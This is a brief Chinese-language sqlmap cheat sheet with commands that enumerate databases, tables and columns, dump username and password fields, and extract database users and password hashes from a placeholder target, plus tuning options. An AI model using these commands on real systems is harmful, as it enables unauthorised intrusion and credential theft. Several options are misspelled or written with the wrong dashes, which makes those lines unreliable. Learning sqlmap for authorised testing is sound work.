sqlmap的简单利用
1、爆全部库名
`sqlmap.py -u 地址 ?id=1 --dbs` ***?id=1 不能漏,不然找不到,这里的--也可以是-,还有大小写也要注意一下。
2、爆指定库全部表名
`sqlmap.py -u 地址 ?id=1 -D securtiy -tables`
3、爆指定表中的字段
`sqlmap.py -u 地址 ?id=1 -D security -T users -columns `
4、 爆字段里面的内容
`sqlmap.py -u 地址 ?id=1 -D security -T users -C id,password,username -dump`
5、 爆数据库的所有用户
`sqlmap.py -u 地址 ?id=1 -users`
6、 爆数据库用户的密码
`sqlmap.py -u 地址 ?id=1 -passwords`
7、 获得当前网站数据库名称
`sqlmap.py -u 地址 ?id=1 -current-db` 这里的-不能空格
当前用户名同样。
优化sqlmap
设置持久连接
`sqlmap.py -u 地址 ?id=1 -keep-alive --banner -v 5 `
设置不接受http body
`sqlmap.py -u 地址 ?id=1 --null connection`
运行速度
`sqlmap.py -u 地址 ?id=1 --threads=3`
一键优化
`sqlmap.py -u 地址 ?id=1 -o --banner -v 5`
